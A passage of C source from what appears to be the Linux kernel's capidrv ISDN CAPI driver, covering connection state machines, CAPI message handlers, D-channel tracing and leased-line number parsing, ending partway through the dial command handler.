while (p->event) {
if (plci->state == p->actstate && p->event == event) {
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: plci_change_state:0x%x %d -> %d\n",
card->contrnr, plci->plci, plci->state, p->nextstate);
plci->state = p->nextstate;
if (p->changefunc)
p->changefunc(card, plci);
return;
}
p++;
}
printk(KERN_ERR "capidrv-%d: plci_change_state:0x%x state=%d event=%d ????\n",
card->contrnr, plci->plci, plci->state, event);
}
/* ------------------------------------------------------------------ */
static _cmsg cmsg;
static void n0(capidrv_contr *card, capidrv_ncci *ncci)
{
isdn_ctrl cmd;
capi_fill_DISCONNECT_REQ(&cmsg,
global.ap.applid,
card->msgid++,
ncci->plcip->plci,
NULL, /* BChannelinformation */
NULL, /* Keypadfacility */
NULL, /* Useruserdata */ /* $$$$ */
NULL /* Facilitydataarray */
);
plci_change_state(card, ncci->plcip, EV_PLCI_DISCONNECT_REQ);
send_message(card, &cmsg);
cmd.command = ISDN_STAT_BHUP;
cmd.driver = card->myid;
cmd.arg = ncci->chan;
card->interface.statcallb(&cmd);
free_ncci(card, ncci);
}
/* ------------------------------------------------------------------ */
struct nccistatechange {
int actstate;
int nextstate;
int event;
void (*changefunc)(capidrv_contr *card, capidrv_ncci *ncci);
};
static struct nccistatechange nccitable[] =
{
/* N-0 */
{ST_NCCI_NONE, ST_NCCI_OUTGOING, EV_NCCI_CONNECT_B3_REQ, NULL},
{ST_NCCI_NONE, ST_NCCI_INCOMING, EV_NCCI_CONNECT_B3_IND, NULL},
/* N-0.1 */
{ST_NCCI_OUTGOING, ST_NCCI_ALLOCATED, EV_NCCI_CONNECT_B3_CONF_OK, NULL},
{ST_NCCI_OUTGOING, ST_NCCI_NONE, EV_NCCI_CONNECT_B3_CONF_ERROR, n0},
/* N-1 */
{ST_NCCI_INCOMING, ST_NCCI_DISCONNECTING, EV_NCCI_CONNECT_B3_REJECT, NULL},
{ST_NCCI_INCOMING, ST_NCCI_ALLOCATED, EV_NCCI_CONNECT_B3_RESP, NULL},
{ST_NCCI_INCOMING, ST_NCCI_DISCONNECTED, EV_NCCI_DISCONNECT_B3_IND, NULL},
{ST_NCCI_INCOMING, ST_NCCI_DISCONNECTING, EV_NCCI_DISCONNECT_B3_REQ, NULL},
/* N-2 */
{ST_NCCI_ALLOCATED, ST_NCCI_ACTIVE, EV_NCCI_CONNECT_B3_ACTIVE_IND, NULL},
{ST_NCCI_ALLOCATED, ST_NCCI_DISCONNECTED, EV_NCCI_DISCONNECT_B3_IND, NULL},
{ST_NCCI_ALLOCATED, ST_NCCI_DISCONNECTING, EV_NCCI_DISCONNECT_B3_REQ, NULL},
/* N-ACT */
{ST_NCCI_ACTIVE, ST_NCCI_ACTIVE, EV_NCCI_RESET_B3_IND, NULL},
{ST_NCCI_ACTIVE, ST_NCCI_RESETING, EV_NCCI_RESET_B3_REQ, NULL},
{ST_NCCI_ACTIVE, ST_NCCI_DISCONNECTED, EV_NCCI_DISCONNECT_B3_IND, NULL},
{ST_NCCI_ACTIVE, ST_NCCI_DISCONNECTING, EV_NCCI_DISCONNECT_B3_REQ, NULL},
/* N-3 */
{ST_NCCI_RESETING, ST_NCCI_ACTIVE, EV_NCCI_RESET_B3_IND, NULL},
{ST_NCCI_RESETING, ST_NCCI_DISCONNECTED, EV_NCCI_DISCONNECT_B3_IND, NULL},
{ST_NCCI_RESETING, ST_NCCI_DISCONNECTING, EV_NCCI_DISCONNECT_B3_REQ, NULL},
/* N-4 */
{ST_NCCI_DISCONNECTING, ST_NCCI_DISCONNECTED, EV_NCCI_DISCONNECT_B3_IND, NULL},
{ST_NCCI_DISCONNECTING, ST_NCCI_PREVIOUS, EV_NCCI_DISCONNECT_B3_CONF_ERROR, NULL},
/* N-5 */
{ST_NCCI_DISCONNECTED, ST_NCCI_NONE, EV_NCCI_DISCONNECT_B3_RESP, n0},
{},
};
static void ncci_change_state(capidrv_contr *card, capidrv_ncci *ncci, int event)
{
struct nccistatechange *p = nccitable;
while (p->event) {
if (ncci->state == p->actstate && p->event == event) {
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: ncci_change_state:0x%x %d -> %d\n",
card->contrnr, ncci->ncci, ncci->state, p->nextstate);
if (p->nextstate == ST_NCCI_PREVIOUS) {
ncci->state = ncci->oldstate;
ncci->oldstate = p->actstate;
} else {
ncci->oldstate = p->actstate;
ncci->state = p->nextstate;
}
if (p->changefunc)
p->changefunc(card, ncci);
return;
}
p++;
}
printk(KERN_ERR "capidrv-%d: ncci_change_state:0x%x state=%d event=%d ????\n",
card->contrnr, ncci->ncci, ncci->state, event);
}
/* ------------------------------------------------------------------- */
static inline int new_bchan(capidrv_contr *card)
{
int i;
for (i = 0; i < card->nbchan; i++) {
if (card->bchans[i].plcip == NULL) {
card->bchans[i].disconnecting = 0;
return i;
}
}
return -1;
}
/* ------------------------------------------------------------------- */
static void handle_controller(_cmsg *cmsg)
{
capidrv_contr *card = findcontrbynumber(cmsg->adr.adrController & 0x7f);
if (!card) {
printk(KERN_ERR "capidrv: %s from unknown controller 0x%x\n",
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController & 0x7f);
return;
}
switch (CAPICMD(cmsg->Command, cmsg->Subcommand)) {
case CAPI_LISTEN_CONF: /* Controller */
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: listenconf Info=0x%4x (%s) cipmask=0x%x\n",
card->contrnr, cmsg->Info, capi_info2str(cmsg->Info), card->cipmask);
if (cmsg->Info) {
listen_change_state(card, EV_LISTEN_CONF_ERROR);
} else if (card->cipmask == 0) {
listen_change_state(card, EV_LISTEN_CONF_EMPTY);
} else {
listen_change_state(card, EV_LISTEN_CONF_OK);
}
break;
case CAPI_MANUFACTURER_IND: /* Controller */
if (cmsg->ManuID == 0x214D5641
&& cmsg->Class == 0
&& cmsg->Function == 1) {
u8 *data = cmsg->ManuData + 3;
u16 len = cmsg->ManuData[0];
u16 layer;
int direction;
if (len == 255) {
len = (cmsg->ManuData[1] | (cmsg->ManuData[2] << 8));
data += 2;
}
len -= 2;
layer = ((*(data - 1)) << 8) | *(data - 2);
if (layer & 0x300)
direction = (layer & 0x200) ? 0 : 1;
else direction = (layer & 0x800) ? 0 : 1;
if (layer & 0x0C00) {
if ((layer & 0xff) == 0x80) {
handle_dtrace_data(card, direction, 1, data, len);
break;
}
} else if ((layer & 0xff) < 0x80) {
handle_dtrace_data(card, direction, 0, data, len);
break;
}
printk(KERN_INFO "capidrv-%d: %s from controller 0x%x layer 0x%x, ignored\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController, layer);
break;
}
goto ignored;
case CAPI_MANUFACTURER_CONF: /* Controller */
if (cmsg->ManuID == 0x214D5641) {
char *s = NULL;
switch (cmsg->Class) {
case 0: break;
case 1: s = "unknown class"; break;
case 2: s = "unknown function"; break;
default: s = "unknown error"; break;
}
if (s)
printk(KERN_INFO "capidrv-%d: %s from controller 0x%x function %d: %s\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController,
cmsg->Function, s);
break;
}
goto ignored;
case CAPI_FACILITY_IND: /* Controller/plci/ncci */
goto ignored;
case CAPI_FACILITY_CONF: /* Controller/plci/ncci */
goto ignored;
case CAPI_INFO_IND: /* Controller/plci */
goto ignored;
case CAPI_INFO_CONF: /* Controller/plci */
goto ignored;
default:
printk(KERN_ERR "capidrv-%d: got %s from controller 0x%x ???",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController);
}
return;
ignored:
printk(KERN_INFO "capidrv-%d: %s from controller 0x%x ignored\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController);
}
static void handle_incoming_call(capidrv_contr *card, _cmsg *cmsg)
{
capidrv_plci *plcip;
capidrv_bchan *bchan;
isdn_ctrl cmd;
int chan;
if ((chan = new_bchan(card)) == -1) {
printk(KERN_ERR "capidrv-%d: incoming call on not existing bchan ?\n", card->contrnr);
return;
}
bchan = &card->bchans[chan];
if ((plcip = new_plci(card, chan)) == NULL) {
printk(KERN_ERR "capidrv-%d: incoming call: no memory, sorry.\n", card->contrnr);
return;
}
bchan->incoming = 1;
plcip->plci = cmsg->adr.adrPLCI;
plci_change_state(card, plcip, EV_PLCI_CONNECT_IND);
cmd.command = ISDN_STAT_ICALL;
cmd.driver = card->myid;
cmd.arg = chan;
memset(&cmd.parm.setup, 0, sizeof(cmd.parm.setup));
strncpy(cmd.parm.setup.phone,
cmsg->CallingPartyNumber + 3,
cmsg->CallingPartyNumber[0] - 2);
strncpy(cmd.parm.setup.eazmsn,
cmsg->CalledPartyNumber + 2,
cmsg->CalledPartyNumber[0] - 1);
cmd.parm.setup.si1 = cip2si1(cmsg->CIPValue);
cmd.parm.setup.si2 = cip2si2(cmsg->CIPValue);
cmd.parm.setup.plan = cmsg->CallingPartyNumber[1];
cmd.parm.setup.screen = cmsg->CallingPartyNumber[2];
printk(KERN_INFO "capidrv-%d: incoming call %s,%d,%d,%s\n",
card->contrnr,
cmd.parm.setup.phone,
cmd.parm.setup.si1,
cmd.parm.setup.si2,
cmd.parm.setup.eazmsn);
if (cmd.parm.setup.si1 == 1 && cmd.parm.setup.si2 != 0) {
printk(KERN_INFO "capidrv-%d: patching si2=%d to 0 for VBOX\n",
card->contrnr,
cmd.parm.setup.si2);
cmd.parm.setup.si2 = 0;
}
switch (card->interface.statcallb(&cmd)) {
case 0:
case 3:
/* No device matching this call.
* and isdn_common.c has send a HANGUP command
* which is ignored in state ST_PLCI_INCOMING,
* so we send RESP to ignore the call
*/
capi_cmsg_answer(cmsg);
cmsg->Reject = 1; /* ignore */
plci_change_state(card, plcip, EV_PLCI_CONNECT_REJECT);
send_message(card, cmsg);
printk(KERN_INFO "capidrv-%d: incoming call %s,%d,%d,%s ignored\n",
card->contrnr,
cmd.parm.setup.phone,
cmd.parm.setup.si1,
cmd.parm.setup.si2,
cmd.parm.setup.eazmsn);
break;
case 1:
/* At least one device matching this call (RING on ttyI)
* HL-driver may send ALERTING on the D-channel in this
* case.
* really means: RING on ttyI or a net interface
* accepted this call already.
*
* If the call was accepted, state has already changed,
* and CONNECT_RESP already sent.
*/
if (plcip->state == ST_PLCI_INCOMING) {
printk(KERN_INFO "capidrv-%d: incoming call %s,%d,%d,%s tty alerting\n",
card->contrnr,
cmd.parm.setup.phone,
cmd.parm.setup.si1,
cmd.parm.setup.si2,
cmd.parm.setup.eazmsn);
capi_fill_ALERT_REQ(cmsg,
global.ap.applid,
card->msgid++,
plcip->plci, /* adr */
NULL,/* BChannelinformation */
NULL,/* Keypadfacility */
NULL,/* Useruserdata */
NULL /* Facilitydataarray */
);
plcip->msgid = cmsg->Messagenumber;
send_message(card, cmsg);
} else {
printk(KERN_INFO "capidrv-%d: incoming call %s,%d,%d,%s on netdev\n",
card->contrnr,
cmd.parm.setup.phone,
cmd.parm.setup.si1,
cmd.parm.setup.si2,
cmd.parm.setup.eazmsn);
}
break;
case 2: /* Call will be rejected. */
capi_cmsg_answer(cmsg);
cmsg->Reject = 2; /* reject call, normal call clearing */
plci_change_state(card, plcip, EV_PLCI_CONNECT_REJECT);
send_message(card, cmsg);
break;
default:
/* An error happened. (Invalid parameters for example.) */
capi_cmsg_answer(cmsg);
cmsg->Reject = 8; /* reject call,
destination out of order */
plci_change_state(card, plcip, EV_PLCI_CONNECT_REJECT);
send_message(card, cmsg);
break;
}
return;
}
static void handle_plci(_cmsg *cmsg)
{
capidrv_contr *card = findcontrbynumber(cmsg->adr.adrController & 0x7f);
capidrv_plci *plcip;
isdn_ctrl cmd;
_cdebbuf *cdb;
if (!card) {
printk(KERN_ERR "capidrv: %s from unknown controller 0x%x\n",
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController & 0x7f);
return;
}
switch (CAPICMD(cmsg->Command, cmsg->Subcommand)) {
case CAPI_DISCONNECT_IND: /* plci */
if (cmsg->Reason) {
printk(KERN_INFO "capidrv-%d: %s reason 0x%x (%s) for plci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Reason, capi_info2str(cmsg->Reason), cmsg->adr.adrPLCI);
}
if (!(plcip = find_plci_by_plci(card, cmsg->adr.adrPLCI))) {
capi_cmsg_answer(cmsg);
send_message(card, cmsg);
goto notfound;
}
card->bchans[plcip->chan].disconnecting = 1;
plci_change_state(card, plcip, EV_PLCI_DISCONNECT_IND);
capi_cmsg_answer(cmsg);
plci_change_state(card, plcip, EV_PLCI_DISCONNECT_RESP);
send_message(card, cmsg);
break;
case CAPI_DISCONNECT_CONF: /* plci */
if (cmsg->Info) {
printk(KERN_INFO "capidrv-%d: %s info 0x%x (%s) for plci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Info, capi_info2str(cmsg->Info),
cmsg->adr.adrPLCI);
}
if (!(plcip = find_plci_by_plci(card, cmsg->adr.adrPLCI)))
goto notfound;
card->bchans[plcip->chan].disconnecting = 1;
break;
case CAPI_ALERT_CONF: /* plci */
if (cmsg->Info) {
printk(KERN_INFO "capidrv-%d: %s info 0x%x (%s) for plci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Info, capi_info2str(cmsg->Info),
cmsg->adr.adrPLCI);
}
break;
case CAPI_CONNECT_IND: /* plci */
handle_incoming_call(card, cmsg);
break;
case CAPI_CONNECT_CONF: /* plci */
if (cmsg->Info) {
printk(KERN_INFO "capidrv-%d: %s info 0x%x (%s) for plci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Info, capi_info2str(cmsg->Info),
cmsg->adr.adrPLCI);
}
if (!(plcip = find_plci_by_msgid(card, cmsg->Messagenumber)))
goto notfound;
plcip->plci = cmsg->adr.adrPLCI;
if (cmsg->Info) {
plci_change_state(card, plcip, EV_PLCI_CONNECT_CONF_ERROR);
} else {
plci_change_state(card, plcip, EV_PLCI_CONNECT_CONF_OK);
}
break;
case CAPI_CONNECT_ACTIVE_IND: /* plci */
if (!(plcip = find_plci_by_plci(card, cmsg->adr.adrPLCI)))
goto notfound;
if (card->bchans[plcip->chan].incoming) {
capi_cmsg_answer(cmsg);
plci_change_state(card, plcip, EV_PLCI_CONNECT_ACTIVE_IND);
send_message(card, cmsg);
} else {
capidrv_ncci *nccip;
capi_cmsg_answer(cmsg);
send_message(card, cmsg);
nccip = new_ncci(card, plcip, cmsg->adr.adrPLCI);
if (!nccip) {
printk(KERN_ERR "capidrv-%d: no mem for ncci, sorry\n", card->contrnr);
break; /* $$$$ */
}
capi_fill_CONNECT_B3_REQ(cmsg,
global.ap.applid,
card->msgid++,
plcip->plci, /* adr */
NULL /* NCPI */
);
nccip->msgid = cmsg->Messagenumber;
plci_change_state(card, plcip,
EV_PLCI_CONNECT_ACTIVE_IND);
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_REQ);
send_message(card, cmsg);
cmd.command = ISDN_STAT_DCONN;
cmd.driver = card->myid;
cmd.arg = plcip->chan;
card->interface.statcallb(&cmd);
}
break;
case CAPI_INFO_IND: /* Controller/plci */
if (!(plcip = find_plci_by_plci(card, cmsg->adr.adrPLCI)))
goto notfound;
if (cmsg->InfoNumber == 0x4000) {
if (cmsg->InfoElement[0] == 4) {
cmd.command = ISDN_STAT_CINF;
cmd.driver = card->myid;
cmd.arg = plcip->chan;
sprintf(cmd.parm.num, "%lu",
(unsigned long)
((u32) cmsg->InfoElement[1]
| ((u32) (cmsg->InfoElement[2]) << 8)
| ((u32) (cmsg->InfoElement[3]) << 16)
| ((u32) (cmsg->InfoElement[4]) << 24)));
card->interface.statcallb(&cmd);
break;
}
}
cdb = capi_cmsg2str(cmsg);
if (cdb) {
printk(KERN_WARNING "capidrv-%d: %s\n",
card->contrnr, cdb->buf);
cdebbuf_free(cdb);
} else
printk(KERN_WARNING "capidrv-%d: CAPI_INFO_IND InfoNumber %x not handled\n",
card->contrnr, cmsg->InfoNumber);
break;
case CAPI_CONNECT_ACTIVE_CONF: /* plci */
goto ignored;
case CAPI_SELECT_B_PROTOCOL_CONF: /* plci */
goto ignored;
case CAPI_FACILITY_IND: /* Controller/plci/ncci */
goto ignored;
case CAPI_FACILITY_CONF: /* Controller/plci/ncci */
goto ignored;
case CAPI_INFO_CONF: /* Controller/plci */
goto ignored;
default:
printk(KERN_ERR "capidrv-%d: got %s for plci 0x%x ???",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrPLCI);
}
return;
ignored:
printk(KERN_INFO "capidrv-%d: %s for plci 0x%x ignored\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrPLCI);
return;
notfound:
printk(KERN_ERR "capidrv-%d: %s: plci 0x%x not found\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrPLCI);
return;
}
static void handle_ncci(_cmsg *cmsg)
{
capidrv_contr *card = findcontrbynumber(cmsg->adr.adrController & 0x7f);
capidrv_plci *plcip;
capidrv_ncci *nccip;
isdn_ctrl cmd;
int len;
if (!card) {
printk(KERN_ERR "capidrv: %s from unknown controller 0x%x\n",
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController & 0x7f);
return;
}
switch (CAPICMD(cmsg->Command, cmsg->Subcommand)) {
case CAPI_CONNECT_B3_ACTIVE_IND: /* ncci */
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI)))
goto notfound;
capi_cmsg_answer(cmsg);
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_ACTIVE_IND);
send_message(card, cmsg);
cmd.command = ISDN_STAT_BCONN;
cmd.driver = card->myid;
cmd.arg = nccip->chan;
card->interface.statcallb(&cmd);
printk(KERN_INFO "capidrv-%d: chan %d up with ncci 0x%x\n",
card->contrnr, nccip->chan, nccip->ncci);
break;
case CAPI_CONNECT_B3_ACTIVE_CONF: /* ncci */
goto ignored;
case CAPI_CONNECT_B3_IND: /* ncci */
plcip = find_plci_by_ncci(card, cmsg->adr.adrNCCI);
if (plcip) {
nccip = new_ncci(card, plcip, cmsg->adr.adrNCCI);
if (nccip) {
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_IND);
capi_fill_CONNECT_B3_RESP(cmsg,
global.ap.applid,
card->msgid++,
nccip->ncci, /* adr */
0, /* Reject */
NULL /* NCPI */
);
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_RESP);
send_message(card, cmsg);
break;
}
printk(KERN_ERR "capidrv-%d: no mem for ncci, sorry\n", card->contrnr);
} else {
printk(KERN_ERR "capidrv-%d: %s: plci for ncci 0x%x not found\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrNCCI);
}
capi_fill_CONNECT_B3_RESP(cmsg,
global.ap.applid,
card->msgid++,
cmsg->adr.adrNCCI,
2, /* Reject */
NULL /* NCPI */
);
send_message(card, cmsg);
break;
case CAPI_CONNECT_B3_CONF: /* ncci */
if (!(nccip = find_ncci_by_msgid(card,
cmsg->adr.adrNCCI,
cmsg->Messagenumber)))
goto notfound;
nccip->ncci = cmsg->adr.adrNCCI;
if (cmsg->Info) {
printk(KERN_INFO "capidrv-%d: %s info 0x%x (%s) for ncci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Info, capi_info2str(cmsg->Info),
cmsg->adr.adrNCCI);
}
if (cmsg->Info)
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_CONF_ERROR);
else
ncci_change_state(card, nccip, EV_NCCI_CONNECT_B3_CONF_OK);
break;
case CAPI_CONNECT_B3_T90_ACTIVE_IND: /* ncci */
capi_cmsg_answer(cmsg);
send_message(card, cmsg);
break;
case CAPI_DATA_B3_IND: /* ncci */
/* handled in handle_data() */
goto ignored;
case CAPI_DATA_B3_CONF: /* ncci */
if (cmsg->Info) {
printk(KERN_WARNING "CAPI_DATA_B3_CONF: Info %x - %s\n",
cmsg->Info, capi_info2str(cmsg->Info));
}
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI)))
goto notfound;
len = capidrv_del_ack(nccip, cmsg->DataHandle);
if (len < 0)
break;
cmd.command = ISDN_STAT_BSENT;
cmd.driver = card->myid;
cmd.arg = nccip->chan;
cmd.parm.length = len;
card->interface.statcallb(&cmd);
break;
case CAPI_DISCONNECT_B3_IND: /* ncci */
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI)))
goto notfound;
card->bchans[nccip->chan].disconnecting = 1;
ncci_change_state(card, nccip, EV_NCCI_DISCONNECT_B3_IND);
capi_cmsg_answer(cmsg);
ncci_change_state(card, nccip, EV_NCCI_DISCONNECT_B3_RESP);
send_message(card, cmsg);
break;
case CAPI_DISCONNECT_B3_CONF: /* ncci */
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI)))
goto notfound;
if (cmsg->Info) {
printk(KERN_INFO "capidrv-%d: %s info 0x%x (%s) for ncci 0x%x\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->Info, capi_info2str(cmsg->Info),
cmsg->adr.adrNCCI);
ncci_change_state(card, nccip, EV_NCCI_DISCONNECT_B3_CONF_ERROR);
}
break;
case CAPI_RESET_B3_IND: /* ncci */
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI)))
goto notfound;
ncci_change_state(card, nccip, EV_NCCI_RESET_B3_IND);
capi_cmsg_answer(cmsg);
send_message(card, cmsg);
break;
case CAPI_RESET_B3_CONF: /* ncci */
goto ignored; /* $$$$ */
case CAPI_FACILITY_IND: /* Controller/plci/ncci */
goto ignored;
case CAPI_FACILITY_CONF: /* Controller/plci/ncci */
goto ignored;
default:
printk(KERN_ERR "capidrv-%d: got %s for ncci 0x%x ???",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrNCCI);
}
return;
ignored:
printk(KERN_INFO "capidrv-%d: %s for ncci 0x%x ignored\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrNCCI);
return;
notfound:
printk(KERN_ERR "capidrv-%d: %s: ncci 0x%x not found\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrNCCI);
}
static void handle_data(_cmsg *cmsg, struct sk_buff *skb)
{
capidrv_contr *card = findcontrbynumber(cmsg->adr.adrController & 0x7f);
capidrv_ncci *nccip;
if (!card) {
printk(KERN_ERR "capidrv: %s from unknown controller 0x%x\n",
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController & 0x7f);
kfree_skb(skb);
return;
}
if (!(nccip = find_ncci(card, cmsg->adr.adrNCCI))) {
printk(KERN_ERR "capidrv-%d: %s: ncci 0x%x not found\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrNCCI);
kfree_skb(skb);
return;
}
(void) skb_pull(skb, CAPIMSG_LEN(skb->data));
card->interface.rcvcallb_skb(card->myid, nccip->chan, skb);
capi_cmsg_answer(cmsg);
send_message(card, cmsg);
}
static _cmsg s_cmsg;
static void capidrv_recv_message(struct capi20_appl *ap, struct sk_buff *skb)
{
capi_message2cmsg(&s_cmsg, skb->data);
if (debugmode > 3) {
_cdebbuf *cdb = capi_cmsg2str(&s_cmsg);
if (cdb) {
printk(KERN_DEBUG "%s: applid=%d %s\n", __func__,
ap->applid, cdb->buf);
cdebbuf_free(cdb);
} else
printk(KERN_DEBUG "%s: applid=%d %s not traced\n",
__func__, ap->applid,
capi_cmd2str(s_cmsg.Command, s_cmsg.Subcommand));
}
if (s_cmsg.Command == CAPI_DATA_B3
&& s_cmsg.Subcommand == CAPI_IND) {
handle_data(&s_cmsg, skb);
return;
}
if ((s_cmsg.adr.adrController & 0xffffff00) == 0)
handle_controller(&s_cmsg);
else if ((s_cmsg.adr.adrPLCI & 0xffff0000) == 0)
handle_plci(&s_cmsg);
else
handle_ncci(&s_cmsg);
/*
* data of skb used in s_cmsg,
* free data when s_cmsg is not used again
* thanks to Lars Heete <[email protected]>
*/
kfree_skb(skb);
}
/* ------------------------------------------------------------------- */
#define PUTBYTE_TO_STATUS(card, byte) \
do { \
*(card)->q931_write++ = (byte); \
if ((card)->q931_write > (card)->q931_end) \
(card)->q931_write = (card)->q931_buf; \
} while (0)
static void handle_dtrace_data(capidrv_contr *card,
int send, int level2, u8 *data, u16 len)
{
u8 *p, *end;
isdn_ctrl cmd;
if (!len) {
printk(KERN_DEBUG "capidrv-%d: avmb1_q931_data: len == %d\n",
card->contrnr, len);
return;
}
if (level2) {
PUTBYTE_TO_STATUS(card, 'D');
PUTBYTE_TO_STATUS(card, '2');
PUTBYTE_TO_STATUS(card, send ? '>' : '<');
PUTBYTE_TO_STATUS(card, ':');
} else {
PUTBYTE_TO_STATUS(card, 'D');
PUTBYTE_TO_STATUS(card, '3');
PUTBYTE_TO_STATUS(card, send ? '>' : '<');
PUTBYTE_TO_STATUS(card, ':');
}
for (p = data, end = data + len; p < end; p++) {
PUTBYTE_TO_STATUS(card, ' ');
PUTBYTE_TO_STATUS(card, hex_asc_hi(*p));
PUTBYTE_TO_STATUS(card, hex_asc_lo(*p));
}
PUTBYTE_TO_STATUS(card, '\n');
cmd.command = ISDN_STAT_STAVAIL;
cmd.driver = card->myid;
cmd.arg = len * 3 + 5;
card->interface.statcallb(&cmd);
}
/* ------------------------------------------------------------------- */
static _cmsg cmdcmsg;
static int capidrv_ioctl(isdn_ctrl *c, capidrv_contr *card)
{
switch (c->arg) {
case 1:
debugmode = (int)(*((unsigned int *)c->parm.num));
printk(KERN_DEBUG "capidrv-%d: debugmode=%d\n",
card->contrnr, debugmode);
return 0;
default:
printk(KERN_DEBUG "capidrv-%d: capidrv_ioctl(%ld) called ??\n",
card->contrnr, c->arg);
return -EINVAL;
}
return -EINVAL;
}
/*
* Handle leased lines (CAPI-Bundling)
*/
struct internal_bchannelinfo {
unsigned short channelalloc;
unsigned short operation;
unsigned char cmask[31];
};
static int decodeFVteln(char *teln, unsigned long *bmaskp, int *activep)
{
unsigned long bmask = 0;
int active = !0;
char *s;
int i;
if (strncmp(teln, "FV:", 3) != 0)
return 1;
s = teln + 3;
while (*s && *s == ' ') s++;
if (!*s) return -2;
if (*s == 'p' || *s == 'P') {
active = 0;
s++;
}
if (*s == 'a' || *s == 'A') {
active = !0;
s++;
}
while (*s) {
int digit1 = 0;
int digit2 = 0;
char *endp;
digit1 = simple_strtoul(s, &endp, 10);
if (s == endp)
return -3;
s = endp;
if (digit1 <= 0 || digit1 > 30) return -4;
if (*s == 0 || *s == ',' || *s == ' ') {
bmask |= (1 << digit1);
digit1 = 0;
if (*s) s++;
continue;
}
if (*s != '-') return -5;
s++;
digit2 = simple_strtoul(s, &endp, 10);
if (s == endp)
return -3;
s = endp;
if (digit2 <= 0 || digit2 > 30) return -4;
if (*s == 0 || *s == ',' || *s == ' ') {
if (digit1 > digit2)
for (i = digit2; i <= digit1; i++)
bmask |= (1 << i);
else
for (i = digit1; i <= digit2; i++)
bmask |= (1 << i);
digit1 = digit2 = 0;
if (*s) s++;
continue;
}
return -6;
}
if (activep) *activep = active;
if (bmaskp) *bmaskp = bmask;
return 0;
}
static int FVteln2capi20(char *teln, u8 AdditionalInfo[1 + 2 + 2 + 31])
{
unsigned long bmask;
int active;
int rc, i;
rc = decodeFVteln(teln, &bmask, &active);
if (rc) return rc;
/* Length */
AdditionalInfo[0] = 2 + 2 + 31;
/* Channel: 3 => use channel allocation */
AdditionalInfo[1] = 3; AdditionalInfo[2] = 0;
/* Operation: 0 => DTE mode, 1 => DCE mode */
if (active) {
AdditionalInfo[3] = 0; AdditionalInfo[4] = 0;
} else {
AdditionalInfo[3] = 1; AdditionalInfo[4] = 0;
}
/* Channel mask array */
AdditionalInfo[5] = 0; /* no D-Channel */
for (i = 1; i <= 30; i++)
AdditionalInfo[5 + i] = (bmask & (1 << i)) ? 0xff : 0;
return 0;
}
static int capidrv_command(isdn_ctrl *c, capidrv_contr *card)
{
isdn_ctrl cmd;
struct capidrv_bchan *bchan;
struct capidrv_plci *plcip;
u8 AdditionalInfo[1 + 2 + 2 + 31];
int rc, isleasedline = 0;
if (c->command == ISDN_CMD_IOCTL)
return capidrv_ioctl(c, card);
switch (c->command) {
case ISDN_CMD_DIAL:{
u8 calling[ISDN_MSNLEN + 3];
u8 called[ISDN_MSNLEN + 2];
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: ISDN_CMD_DIAL(ch=%ld,\"%s,%d,%d,%s\")\n",
card->contrnr,
c->arg,
c->parm.setup.phone,
c->parm.setup.si1,
c->parm.setup.si2,
c->parm.setup.eazmsn);
bchan = &card->bchans[c->arg % card->nbchan];
if (bchan->plcip) {
printk(KERN_ERR "capidrv-%d: dail ch=%ld,\"%s,%d,%d,%s\" in use (plci=0x%x)\n",
card->contrnr,
c->arg,
c->parm.setup.phone,
c->parm.setup.si1,
c->parm.setup.si2,
c->parm.setup.eazmsn,
bchan->plcip->plci);
return 0;
}
bchan->si1 = c->parm.setup.si1;
bchan->si2 = c->parm.setup.si2;
strncpy(bchan->num, c->parm.setup.phone, sizeof(bchan->num));
strncpy(bchan->mynum, c->parm.setup.eazmsn, sizeof(bchan->mynum));
rc = FVteln2capi20(bchan->num, AdditionalInfo);
isleasedline = (rc == 0);
if (rc < 0)
printk(KERN_ERR "capidrv-%d: WARNING: invalid leased linedefinition \"%s\"\n", card->contrnr, bchan->num);
if (isleasedline) {
